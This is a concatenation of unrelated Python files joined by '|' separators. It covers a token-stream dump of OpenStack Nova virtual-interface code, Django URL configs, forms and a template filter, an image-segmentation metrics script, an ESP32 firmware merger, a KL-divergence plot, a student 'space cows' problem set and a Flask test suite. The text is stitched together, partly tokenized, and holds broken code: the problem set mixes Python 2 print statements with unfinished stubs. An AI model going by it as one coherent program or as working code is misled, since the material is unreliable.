newline|'\n'
DECL|member|get_by_address
name|'def'
name|'get_by_address'
op|'('
name|'cls'
op|','
name|'context'
op|','
name|'address'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db_vif'
op|'='
name|'db'
op|'.'
name|'virtual_interface_get_by_address'
op|'('
name|'context'
op|','
name|'address'
op|')'
newline|'\n'
name|'if'
name|'db_vif'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'cls'
op|'.'
name|'_from_db_object'
op|'('
name|'context'
op|','
name|'cls'
op|'('
op|')'
op|','
name|'db_vif'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|get_by_instance_and_network
name|'def'
name|'get_by_instance_and_network'
op|'('
name|'cls'
op|','
name|'context'
op|','
name|'instance_uuid'
op|','
name|'network_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db_vif'
op|'='
name|'db'
op|'.'
name|'virtual_interface_get_by_instance_and_network'
op|'('
name|'context'
op|','
nl|'\n'
name|'instance_uuid'
op|','
name|'network_id'
op|')'
newline|'\n'
name|'if'
name|'db_vif'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'cls'
op|'.'
name|'_from_db_object'
op|'('
name|'context'
op|','
name|'cls'
op|'('
op|')'
op|','
name|'db_vif'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable'
newline|'\n'
DECL|member|create
name|'def'
name|'create'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'self'
op|'.'
name|'obj_attr_is_set'
op|'('
string|"'id'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'ObjectActionError'
op|'('
name|'action'
op|'='
string|"'create'"
op|','
nl|'\n'
name|'reason'
op|'='
string|"'already created'"
op|')'
newline|'\n'
dedent|''
name|'updates'
op|'='
name|'self'
op|'.'
name|'obj_get_changes'
op|'('
op|')'
newline|'\n'
name|'db_vif'
op|'='
name|'db'
op|'.'
name|'virtual_interface_create'
op|'('
name|'self'
op|'.'
name|'_context'
op|','
name|'updates'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_from_db_object'
op|'('
name|'self'
op|'.'
name|'_context'
op|','
name|'self'
op|','
name|'db_vif'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|delete_by_instance_uuid
name|'def'
name|'delete_by_instance_uuid'
op|'('
name|'cls'
op|','
name|'context'
op|','
name|'instance_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db'
op|'.'
name|'virtual_interface_delete_by_instance'
op|'('
name|'context'
op|','
name|'instance_uuid'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'base'
op|'.'
name|'NovaObjectRegistry'
op|'.'
name|'register'
newline|'\n'
DECL|class|VirtualInterfaceList
name|'class'
name|'VirtualInterfaceList'
op|'('
name|'base'
op|'.'
name|'ObjectListBase'
op|','
name|'base'
op|'.'
name|'NovaObject'
op|')'
op|':'
newline|'\n'
comment|'# Version 1.0: Initial version'
nl|'\n'
DECL|variable|VERSION
indent|' '
name|'VERSION'
op|'='
string|"'1.0'"
newline|'\n'
DECL|variable|fields
name|'fields'
op|'='
op|'{'
nl|'\n'
string|"'objects'"
op|':'
name|'fields'
op|'.'
name|'ListOfObjectsField'
op|'('
string|"'VirtualInterface'"
op|')'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|get_all
name|'def'
name|'get_all'
op|'('
name|'cls'
op|','
name|'context'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db_vifs'
op|'='
name|'db'
op|'.'
name|'virtual_interface_get_all'
op|'('
name|'context'
op|')'
newline|'\n'
name|'return'
name|'base'
op|'.'
name|'obj_make_list'
op|'('
name|'context'
op|','
name|'cls'
op|'('
name|'context'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'VirtualInterface'
op|','
name|'db_vifs'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'staticmethod'
newline|'\n'
op|'@'
name|'db'
op|'.'
name|'select_db_reader_mode'
newline|'\n'
DECL|member|_db_virtual_interface_get_by_instance
name|'def'
name|'_db_virtual_interface_get_by_instance'
op|'('
name|'context'
op|','
name|'instance_uuid'
op|','
nl|'\n'
name|'use_slave'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'db'
op|'.'
name|'virtual_interface_get_by_instance'
op|'('
name|'context'
op|','
name|'instance_uuid'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|get_by_instance_uuid
name|'def'
name|'get_by_instance_uuid'
op|'('
name|'cls'
op|','
name|'context'
op|','
name|'instance_uuid'
op|','
name|'use_slave'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db_vifs'
op|'='
name|'cls'
op|'.'
name|'_db_virtual_interface_get_by_instance'
op|'('
nl|'\n'
name|'context'
op|','
name|'instance_uuid'
op|','
name|'use_slave'
op|'='
name|'use_slave'
op|')'
newline|'\n'
name|'return'
name|'base'
op|'.'
name|'obj_make_list'
op|'('
name|'context'
op|','
name|'cls'
op|'('
name|'context'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'VirtualInterface'
op|','
name|'db_vifs'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
|
from django import template
register = template.Library()
@register.filter(name='saludo')
def saludo(value):
largo =''
if len(value) >=8:
largo="<p>Tu nombre es muy largo</p>"
return f"<h1 style='background:green;color:white;'>Bienvenido {value}</h1>"+largo |
import util
from util.include import *
arrow_up = [-1, "up"]
arrow_down = [1, "down"]
arrow_left = [-1, "left"]
arrow_right = [1, "right"]
|
from django.urls import path
from django.views.generic import TemplateView
from articleapp.views import ArticleDetailView, ArticleCreateView, ArticleUpdateView, ArticleDeleteView, ArticleListView
app_name = 'articleapp'
urlpatterns = [
path('list/', ArticleListView.as_view(), name='list'),
path('create/', ArticleCreateView.as_view(), name='create'),
path('detail/<int:pk>', ArticleDetailView.as_view(), name='detail'),
path('update/<int:pk>', ArticleUpdateView.as_view(), name='update'),
path('delete/<int:pk>', ArticleDeleteView.as_view(), name='delete'),
] |
import numpy as np
import cv2
import os
import json
from collections import OrderedDict
import argparse
from PIL import Image as PILImage
from utils.transforms import transform_parsing
from tqdm import tqdm
LABELS = ['background', 'skin', 'nose', 'eye_g', 'l_eye', 'r_eye', 'l_brow', 'r_brow', 'l_ear', 'r_ear', 'mouth', 'u_lip', 'l_lip', 'hair', 'hat', 'ear_r', 'neck_l', 'neck', 'cloth']
def get_palette(num_cls):
""" Returns the color map for visualizing the segmentation mask.
Args:
num_cls: Number of classes
Returns:
The color map
"""
n = num_cls
palette = [0] * (n * 3)
for j in range(0, n):
lab = j
palette[j * 3 + 0] = 0
palette[j * 3 + 1] = 0
palette[j * 3 + 2] = 0
i = 0
while lab:
palette[j * 3 + 0] |= (((lab >> 0) & 1) << (7 - i))
palette[j * 3 + 1] |= (((lab >> 1) & 1) << (7 - i))
palette[j * 3 + 2] |= (((lab >> 2) & 1) << (7 - i))
i += 1
lab >>= 3
return palette
def get_confusion_matrix(gt_label, pred_label, num_classes):
"""
Calcute the confusion matrix by given label and pred
:param gt_label: the ground truth label
:param pred_label: the pred label
:param num_classes: the nunber of class
:return: the confusion matrix
"""
index = (gt_label * num_classes + pred_label).astype('int32')
label_count = np.bincount(index)
confusion_matrix = np.zeros((num_classes, num_classes))
for i_label in range(num_classes):
for i_pred_label in range(num_classes):
cur_index = i_label * num_classes + i_pred_label
if cur_index < len(label_count):
confusion_matrix[i_label, i_pred_label] = label_count[cur_index]
return confusion_matrix
def fast_histogram(a, b, na, nb):
'''
fast histogram calculation
---
* a, b: non negative label ids, a.shape == b.shape, a in [0, ... na-1], b in [0, ..., nb-1]
'''
assert a.shape == b.shape
assert np.all((a >= 0) & (a < na) & (b >= 0) & (b < nb))
# k = (a >= 0) & (a < na) & (b >= 0) & (b < nb)
hist = np.bincount(
nb * a.reshape([-1]).astype(int) + b.reshape([-1]).astype(int),
minlength=na * nb).reshape(na, nb)
assert np.sum(hist) == a.size
return hist
def _read_names(file_name):
label_names = []
for name in open(file_name, 'r'):
name = name.strip()
if len(name) > 0:
label_names.append(name)
return label_names
def _merge(*list_pairs):
a = []
b = []
for al, bl in list_pairs:
a += al
b += bl
return a, b
def compute_mean_ioU(preds, scales, centers, num_classes, datadir, input_size=[473, 473], dataset='val', reverse=False):
file_list_name = os.path.join(datadir, dataset + '/files.txt')
val_id = [line.strip() for line in open(file_list_name).readlines()]
confusion_matrix = np.zeros((num_classes, num_classes))
label_names_file = os.path.join(datadir, 'label_names.txt')
gt_label_names = pred_label_names = _read_names(label_names_file)
assert gt_label_names[0] == pred_label_names[0] == 'bg'
hists = []
for i, im_name in enumerate(val_id):
gt_path = os.path.join(datadir, dataset , 'labels', im_name + '.png')
gt = cv2.imread(gt_path, cv2.IMREAD_GRAYSCALE)
h, w = gt.shape
pred_out = preds[i]
s = scales[i]
c = centers[i]
pred = transform_parsing(pred_out, c, s, w, h, input_size)
if reverse:
proj = np.load(os.path.join(datadir, 'project', im_name + '.npy'))
pred = cv2.warpAffine(pred, proj, (gt.shape[1], gt.shape[0]), borderValue=0, flags = cv2.INTER_NEAREST)
gt = np.asarray(gt, dtype=np.int32)
pred = np.asarray(pred, dtype=np.int32)
ignore_index = gt != 255
gt = gt[ignore_index]
pred = pred[ignore_index]
hist = fast_histogram(gt, pred,
len(gt_label_names), len(pred_label_names))
hists.append(hist)
confusion_matrix += get_confusion_matrix(gt, pred, num_classes)
hist_sum = np.sum(np.stack(hists, axis=0), axis=0)
eval_names = dict()
for label_name in gt_label_names:
gt_ind = gt_label_names.index(label_name)
pred_ind = pred_label_names.index(label_name)
eval_names[label_name] = ([gt_ind], [pred_ind])
if 'le' in eval_names and 're' in eval_names:
eval_names['eyes'] = _merge(eval_names['le'], eval_names['re'])
if 'lb' in eval_names and 'rb' in eval_names:
eval_names['brows'] = _merge(eval_names['lb'], eval_names['rb'])
if 'ulip' in eval_names and 'imouth' in eval_names and 'llip' in eval_names:
eval_names['mouth'] = _merge(
eval_names['ulip'], eval_names['imouth'], eval_names['llip'])
if 'eyes' in eval_names and 'brows' in eval_names and 'nose' in eval_names and 'mouth' in eval_names:
eval_names['overall'] = _merge(
eval_names['eyes'], eval_names['brows'], eval_names['nose'], eval_names['mouth'])
print(eval_names)
pos = confusion_matrix.sum(1)
res = confusion_matrix.sum(0)
tp = np.diag(confusion_matrix)
pixel_accuracy = (tp.sum() / pos.sum()) * 100
mean_accuracy = ((tp / np.maximum(1.0, pos)).mean()) * 100
IoU_array = (tp / np.maximum(1.0, pos + res - tp))
IoU_array = IoU_array * 100
mean_IoU = IoU_array.mean()
print('Pixel accuracy: %f \n' % pixel_accuracy)
print('Mean accuracy: %f \n' % mean_accuracy)
print('Mean IU: %f \n' % mean_IoU)
mIoU_value = []
f1_value = []
for i, (label, iou) in enumerate(zip(LABELS, IoU_array)):
mIoU_value.append((label, iou))
for eval_name, (gt_inds, pred_inds) in eval_names.items():
A = hist_sum[gt_inds, :].sum()
B = hist_sum[:, pred_inds].sum()
intersected = hist_sum[gt_inds, :][:, pred_inds].sum()
f1 = 2 * intersected / (A + B)
print(f'f1_{eval_name}={f1}')
f1_value.append((eval_name, f1))
mIoU_value.append(('Pixel accuracy', pixel_accuracy))
mIoU_value.append(('Mean accuracy', mean_accuracy))
mIoU_value.append(('Mean IU', mean_IoU))
mIoU_value = OrderedDict(mIoU_value)
f1_value = OrderedDict(f1_value)
return mIoU_value, f1_value
def write_results(preds, scales, centers, datadir, dataset, result_dir, input_size=[473, 473]):
palette = get_palette(20)
if not os.path.exists(result_dir):
os.makedirs(result_dir)
json_file = os.path.join(datadir, 'annotations', dataset + '.json')
with open(json_file) as data_file:
data_list = json.load(data_file)
data_list = data_list['root']
for item, pred_out, s, c in zip(data_list, preds, scales, centers):
im_name = item['im_name']
w = item['img_width']
h = item['img_height']
pred = transform_parsing(pred_out, c, s, w, h, input_size)
#pred = pred_out
save_path = os.path.join(result_dir, im_name[:-4]+'.png')
output_im = PILImage.fromarray(np.asarray(pred, dtype=np.uint8))
output_im.putpalette(palette)
output_im.save(save_path)
def get_arguments():
"""Parse all the arguments provided from the CLI.
Returns:
A list of parsed arguments.
"""
parser = argparse.ArgumentParser(description="DeepLabLFOV NetworkEv")
parser.add_argument("--pred-path", type=str, default='',
help="Path to predicted segmentation.")
parser.add_argument("--gt-path", type=str, default='',
help="Path to the groundtruth dir.")
return parser.parse_args() |
import sys
OFFSET_BOOTLOADER = 0x1000
OFFSET_PARTITIONS = 0x8000
OFFSET_APPLICATION = 0x10000
files_in = [
('bootloader', OFFSET_BOOTLOADER, sys.argv[1]),
('partitions', OFFSET_PARTITIONS, sys.argv[2]),
('application', OFFSET_APPLICATION, sys.argv[3]),
]
file_out = sys.argv[4]
cur_offset = 0
with open(file_out, 'wb') as fout:
for name, offset, file_in in files_in:
assert offset >= cur_offset
fout.write(b'\xff' * (offset - cur_offset))
cur_offset = offset
with open(file_in, 'rb') as fin:
data = fin.read()
fout.write(data)
cur_offset += len(data)
print('%-12s% 8d' % (name, len(data)))
print('%-12s% 8d' % ('total', cur_offset))
|
from .models import Images,Items
from django import forms
from django.forms.models import inlineformset_factory
class Imageform(forms.ModelForm) :
class Meta :
model=Images
fields=('images',)
imageformset=inlineformset_factory(Items,Images,Imageform,widgets={}) |
import numpy as np
from scipy.special import rel_entr
import matplotlib.pylab as plt
N = 1000000
p = np.random.randint(0,13,size=N)
p = np.bincount(p)
p = p / p.sum()
q = np.random.binomial(12,0.9,size=N)
q = np.bincount(q)
q = q / q.sum()
w = np.random.binomial(12,0.4,size=N)
w = np.bincount(w)
w = w / w.sum()
print(rel_entr(q,p).sum())
print(rel_entr(w,p).sum())
plt.bar(np.arange(13),p,0.333,hatch="///",edgecolor='k')
plt.bar(np.arange(13)+0.333,q,0.333,hatch="---",edgecolor='k')
plt.bar(np.arange(13)+0.666,w,0.333,hatch="\\\\",edgecolor='k')
plt.xlabel("Value")
plt.ylabel("Proportion")
plt.tight_layout(pad=0,h_pad=0,w_pad=0)
plt.savefig("kl_divergence.png", dpi=300)
plt.show()
|
###########################
# 6.00.2x Problem Set 1: Space Cows
from ps1_partition import get_partitions
import time
#================================
# Part A: Transporting Space Cows
#================================
def load_cows(filename):
"""
Read the contents of the given file. Assumes the file contents contain
data in the form of comma-separated cow name, weight pairs, and return a
dictionary containing cow names as keys and corresponding weights as values.
Parameters:
filename - the name of the data file as a string
Returns:
a dictionary of cow name (string), weight (int) pairs
"""
cow_dict = dict()
f = open(filename, 'r')
for line in f:
line_data = line.split(',')
cow_dict[line_data[0]] = int(line_data[1])
return cow_dict
class Cow(object):
def __init__(self, name, cost):
self.name = name;
self.cost = cost;
def getValue(self):
return 1;
def getCost(self):
return self.cost;
def getName(self):
return self.name;
def __str__(self):
return "<" + self.name + ", " + str(self.cost) + ">";
def makeCowsList(cows):
cowsList = [];
for cow in cows:
name = cow;
cost = cows[cow];
cowsList.append(Cow(name, cost));
return cowsList;
def greedy(list, constraint, keyFunction):
menu = list;
sortedMenu = sorted(menu, key=keyFunction, reverse=True)
maxCost = constraint;
#search for the item which satisfy the constraint (maxCost)
bestResult = [];
totalCost, totalValue = 0.0, 0.0;
for i in sortedMenu:
if(totalCost + i.getCost() <= maxCost):
bestResult.append(i);
totalCost = totalCost + i.getCost();
totalValue = totalValue + i.getValue();
#end
return (totalValue, bestResult);
#end
# Problem 1
def greedy_cow_transport(cows,limit=10):
"""
Uses a greedy heuristic to determine an allocation of cows that attempts to
minimize the number of spaceship trips needed to transport all the cows. The
returned allocation of cows may or may not be optimal.
The greedy heuristic should follow the following method:
1. As long as the current trip can fit another cow, add the largest cow that will fit
to the trip
2. Once the trip is full, begin a new trip to transport the remaining cows
Does not mutate the given dictionary of cows.
Parameters:
cows - a dictionary of name (string), weight (int) pairs
limit - weight limit of the spaceship (an int)
Returns:
A list of lists, with each inner list containing the names of cows
transported on a particular trip and the overall list containing all the
trips
"""
# TODO: Your code here
tripsList = [];
while len(cows) > 0:
(value, tripCows) = greedy(cows, limit, lambda x : x.getCost());
cowsInTrip = [];
for cow in tripCows:
cowsInTrip.append(cow.getName());
cows.remove(cow);
tripsList.append(cowsInTrip);
print tripsList;
# Problem 2
def brute_force_cow_transport(cows,limit=10):
"""
Finds the allocation of cows that minimizes the number of spaceship trips
via brute force. The brute force algorithm should follow the following method:
1. Enumerate all possible ways that the cows can be divided into separate trips
2. Select the allocation that minimizes the number of trips without making any trip
that does not obey the weight limitation
Does not mutate the given dictionary of cows.
Parameters:
cows - a dictionary of name (string), weight (int) pairs
limit - weight limit of the spaceship (an int)
Returns:
A list of lists, with each inner list containing the names of cows
transported on a particular trip and the overall list containing all the
trips
"""
# TODO: Your code here
print cows;
# getting valid partitions
validPartitions = [];
for partition in get_partitions(cows):
isValidPartition = True;
for trip in partition:
sum = 0;
for cow in trip:
sum += cow.getCost();
if sum > limit:
isValidPartition = False;
break;
if isValidPartition:
validPartitions.append(partition);
# out of valid partitions getting the best partition according to
# the given constraint.
minTrips = 10000000;
minTripsPartition = [];
for trips in validPartitions:
if len(trips) < minTrips:
minTrips = len(trips);
minTripsPartition = trips;
# representing the solution in the required formate
namedCowsTrips = [];
for trip in minTripsPartition:
nctrip = [];
for cow in trip:
nctrip.append(cow.getName());
namedCowsTrips.append(nctrip);
print namedCowsTrips;
pass
# Problem 3
def compare_cow_transport_algorithms():
"""
Using the data from ps1_cow_data.txt and the specified weight limit, run your
greedy_cow_transport and brute_force_cow_transport functions here. Use the
default weight limits of 10 for both greedy_cow_transport and
brute_force_cow_transport.
Print out the number of trips returned by each method, and how long each
method takes to run in seconds.
Returns:
Does not return anything.
"""
# TODO: Your code here
pass
"""
Here is some test data for you to see the results of your algorithms with.
Do not submit this along with any of your answers. Uncomment the last two
lines to print the result of your problem.
"""
cowsText = load_cows("ps1_cow_data.txt")
limit=10
cows = makeCowsList(cowsText);
(greedy_cow_transport(cows, limit))
cows = makeCowsList(cowsText);
(brute_force_cow_transport(cows, limit))
|
from django.conf.urls import url
from django.core.urlresolvers import reverse_lazy
from . import views
urlpatterns = [
url(r'^register/', views.register_patient_page, name='register'),
url(r'^patient/', views.patient_landing, name='patient'),
url(r'^patients/', views.view_patients, name='view patients'),
url(r'^patientss/(?P<patient_id>\d+)/$', views.admitPatient, name='admit patients'),
url(r'^update_self/', views.editownprofile, name='update'),
# url(r'^update_user/', views.editownpatientprofile, name='update user'),
url(r'^update_med_info/(?P<patient_id>[0-9]+)/',
views.EditPatientMediInfo.as_view(success_url=reverse_lazy('view patients')), name='update medical info for'),
url(r'^view_med_info/(?P<patient_id>[0-9]+)/',
views.ViewPatientMediInfo.as_view(), name='view medical info for'),
url(r'^profile/', views.profile, name='profile'),
url(r'^export/', views.download, name='download'),
url(r'^email/', views.email, name='email_info'),
url(r'^landing/', views.landing, name='landing'),
url(r'^nurse/', views.nurse_landing, name='nurse'),
url(r'^doctor/', views.doctor_landing, name='doctor'),
url(r'^hadmin/', views.admin_landing, name='admin'),
url(r'^new_hospital/', views.NewHospital.as_view(), name='create new hospital'),
url(r'^login/$', views.user_login, name='login'),
url(r'^tests/', views.patient_tests, name='tests'), # Not used any more, redirects to testResults
url(r'^logout/', views.user_logout, name='logout'),
url(r'^logs/', views.logs, name='logs'),
url(r'^upload_patient/', views.upload_patient_info, name='upload patient'),
url(r'^staffregister/', views.registerStaff, name='staffregister'),
url(r'^adminregister/', views.register_admin_page, name='adminregister'),
url(r'^doctorregister/', views.register_doctor_page, name='doctorregister'),
url(r'^nurseregister/', views.register_nurse_page, name='nurseregister'),
url(r'^swag/', views.swag, name='swag'),
url(r'^$', views.main, name='main')
]
|
#!/usr/bin/env python
"""
Copyright 2020, Benjamin L. Dowdell
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from app import create_app
from app.main.forms import ContactForm, TuningWedgeForm
class AppTestCase(unittest.TestCase):
def setUp(self):
self.app = create_app('testing')
self.app_context = self.app.app_context()
self.app_context.push()
self.client = self.app.test_client()
self.soft_ricker_wedge_form = TuningWedgeForm(
layer_1_vp=3000, layer_1_dens=2.5, layer_1_impedance=7500,
layer_2_vp=2700, layer_2_dens=2.3, layer_2_impedance=6210,
vp_units=0, wv_type=0, frequency='25',
wv_length=0.200, wv_dt=0.001
)
self.soft_ormsby_wedge_form = TuningWedgeForm(
layer_1_vp=3000, layer_1_dens=2.5, layer_1_impedance=7500,
layer_2_vp=2700, layer_2_dens=2.3, layer_2_impedance=6210,
vp_units=0, wv_type=1, frequency='5, 10, 40, 50',
wv_length=0.200, wv_dt=0.001
)
def tearDown(self):
self.app_context.pop()
def test_index_page_get(self):
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
def test_index_page_post_ricker(self):
# Ricker Wavelet
response = self.client.post('/index', data=self.soft_ricker_wedge_form.data)
self.assertEqual(response.status_code, 302)
response = self.client.post('/index', data=self.soft_ricker_wedge_form.data, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(self.soft_ricker_wedge_form.validate())
def test_index_page_post_ormsby(self):
# Ormsby Wavelet
response = self.client.post('/index', data=self.soft_ormsby_wedge_form.data)
self.assertEqual(response.status_code, 302)
response = self.client.post('/index', data=self.soft_ormsby_wedge_form.data, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(self.soft_ormsby_wedge_form.validate())
def test_index_page_post_same_impedance(self):
form = self.soft_ricker_wedge_form
form.layer_2_vp.data = form.layer_1_vp.data
form.layer_2_dens.data = form.layer_1_dens.data
form.layer_2_impedance.data = form.layer_1_impedance.data
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200) # form should not validate
self.assertFalse(form.validate())
def test_index_page_post_bad_velocity(self):
# layer_1_vp is empty
form = self.soft_ricker_wedge_form
form.layer_1_vp.data = ''
response = self.client.post('/index', data=dict(layer_1_vp=''))
self.assertEqual(response.status_code, 200) # form should not validate
self.assertFalse(form.validate())
# layer_1_vp is negative
form.layer_1_vp.data = -3000
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200) # form should not validate
self.assertFalse(form.validate())
# layer_1_vp is > 20000
form.layer_1_vp.data = 100000
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200) # should not validate
self.assertFalse(form.validate())
# layer_1_vp is non-numeric
form.layer_1_vp.data = 'apple'
response = self.client.post('/index', data=dict(layer_1_vp='apple'))
self.assertEqual(response.status_code, 200)
with self.assertRaises(TypeError):
form.validate()
def test_index_page_post_bad_density(self):
# layer_1_dens is missing
form = self.soft_ricker_wedge_form
form.layer_1_dens.data = ''
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200) # form should not validate nor follow redirect
self.assertFalse(form.validate())
# layer_1_dens below minimum 1.0
form.layer_1_dens.data = 0.9
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200)
self.assertFalse(form.validate())
# layer_1_dens above maximum 5.0
form.layer_1_dens.data = 5.1
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200)
self.assertFalse(form.validate())
# layer_1_dens is non-numeric
form.layer_1_dens.data = 'apple'
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200)
with self.assertRaises(TypeError):
form.validate()
def test_index_page_post_bad_ricker_num_freqs(self):
# Ricker wavelet too many frequencies
form = self.soft_ricker_wedge_form
form.frequency.data = '30, 20'
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200)
self.assertFalse(form.validate())
def test_index_page_post_bad_ricker_neg_freqs(self):
# Ricker wavelet f_central < 0:
form = self.soft_ricker_wedge_form
form.frequency.data = '-30'
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200)
self.assertFalse(form.validate())
def test_index_page_post_bad_ormsby_bad_sep(self):
# Ormsby wavelet frequencies not comma separated
form = self.soft_ormsby_wedge_form
form.frequency.data = '5 10 15 20'
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200)
self.assertFalse(form.validate())
def test_index_page_post_bad_orsmby_num_freqs(self):
# Ormsby wavelet number of frequencies != 4
form = self.soft_ormsby_wedge_form
form.frequency.data = '5, 10, 20, 30, 40'
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200)
self.assertFalse(form.validate())
form.frequency = '5, 10, 20'
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200)
self.assertFalse(form.validate())
def test_index_page_post_bad_ormsby_neg_freqs(self):
# Ormsby wavelet with negatives frequencies
form = self.soft_ormsby_wedge_form
form.frequency.data = '10, -20, 30, -40'
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200)
self.assertFalse(form.validate())
def test_index_page_post_bad_ormsby_freqs_not_sequential(self):
# Ormsby wavelet frequencies not sequentially ordered from least to greatest
form = self.soft_ormsby_wedge_form
form.frequency.data = '30, 10, 40, 20'
response = self.client.post('/index', data=form.data)
self.assertEqual(response.status_code, 200)
self.assertFalse(form.validate())
def test_about_page_get(self):
response = self.client.get('/about')
self.assertEqual(response.status_code, 200)
def test_contact_page_get(self):
response = self.client.get('/contact')
self.assertEqual(response.status_code, 200)
def test_contact_page_post(self):
form = ContactForm(
name='Test Name',
email='test@mail.com',
subject='Hello World',
body='Is there anybody out there?'
)
response = self.client.post('/contact', data=form.data)
self.assertEqual(response.status_code, 302) # successful validation should result in redirect
response = self.client.post('/contact', data=form.data, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(form.validate())
def test_contact_page_bad_name_field(self):
form = ContactForm(
name=None,
email='test@mail.com',
subject='Hello World',
body='This should not validate'
)
response = self.client.post('/contact', data=form.data)
self.assertIsNot(form.validate(), True) # name is required to validate
self.assertEqual(response.status_code, 200)
def test_contact_page_bad_email_field(self):
form = ContactForm(
name='Test Name',
email='test@mail',
subject='Hello World',
body='This should not validate'
)
response = self.client.post('/contact', data=form.data)
self.assertIsNot(form.validate(), True) # email is not valid
self.assertEqual(response.status_code, 200)
def test_contact_page_bad_subject_field(self):
form = ContactForm(
name='Test Name',
email='test@mail.com',
subject=None,
body='This should not validate'
)
response = self.client.post('/contact', data=form.data)
self.assertIsNot(form.validate(), True) # subject is required to validate
self.assertEqual(response.status_code, 200)
def test_contact_page_bad_body_field(self):
form = ContactForm(
name='Test Name',
email='test@mail.com',
subject='Hello World',
body=None
)
response = self.client.post('/contact', data=form.data)
self.assertIsNot(form.validate(), True) # body is required to validate
self.assertEqual(response.status_code, 200)
form = ContactForm(
name='Test Name',
email='test@mail.com',
subject='Hello World',
body='a'
)
response = self.client.post('/contact', data=form.data)
self.assertIsNot(form.validate(), True) # body should be too short to validate
self.assertEqual(response.status_code, 200)
def test_success_page_get(self):
response = self.client.get('/success')
self.assertEqual(response.status_code, 200)
def test_404_page_not_found_error(self):
response = self.client.get('/bad-url')
self.assertEqual(response.status_code, 404)
self.assertTrue(b'404 error' in response.data)
def test_500_internal_server_error(self):
# https://scotch.io/tutorials/build-a-crud-web-app-with-python-and-flask-part-three
# first example I could find that shows how to actually test that 500 routes correctly
@self.app.route('/500')
def internal_server_error():
from flask import abort
abort(500)
response = self.client.get('/500')
self.assertEqual(response.status_code, 500)
self.assertTrue(b'500 error' in response.data)
def test_forms_NotEqualTo_bad_field(self):
form = self.soft_ricker_wedge_form
form.layer_2_dens.data = form.layer_1_dens.data
from app.main.forms import NotEqualTo
self.assertFalse(form.layer_2_dens.validate(form=form, extra_validators=[NotEqualTo('dens1')]))
def test_forms_NotEqualTo_no_message(self):
form = self.soft_ricker_wedge_form
form.layer_2_dens.data = form.layer_1_dens.data
from app.main.forms import NotEqualTo
self.assertFalse(form.layer_2_dens.validate(
form=form,
extra_validators=[NotEqualTo('layer_1_dens')]
))
def test_forms_ValidateFrequency_bad_field(self):
form = self.soft_ricker_wedge_form
from app.main.forms import ValidateFrequency
self.assertFalse(form.frequency.validate(
form=form,
extra_validators=[ValidateFrequency('wv')]
))
def test_forms_ValidateFrequency_ormsby_no_message(self):
form = self.soft_ormsby_wedge_form
form.frequency.data = 10
from app.main.forms import ValidateFrequency
with self.assertRaises(AttributeError):
form.frequency.validate(form=form, extra_validators=[ValidateFrequency('wv_type')])
def test_forms_ValidateFrequency_ormsby_with_message(self):
form = self.soft_ormsby_wedge_form
form.frequency.data = 10
from app.main.forms import ValidateFrequency
with self.assertRaises(AttributeError):
v = ValidateFrequency('wv_type', message='Test')
v(form, form.frequency)
def test_forms_ValidateFrequency_ricker_no_message(self):
form = self.soft_ricker_wedge_form
form.frequency.data = 10
from app.main.forms import ValidateFrequency
with self.assertRaises(AttributeError):
form.frequency.validate(form=form, extra_validators=[ValidateFrequency('wv_type')])
def test_forms_ValidateFrequency_ricker_with_message(self):
form = self.soft_ricker_wedge_form
form.frequency.data = 10
from app.main.forms import ValidateFrequency
with self.assertRaises(AttributeError):
v = ValidateFrequency('wv_type', message='Test')
v(form, form.frequency)
|
from typing import Collection
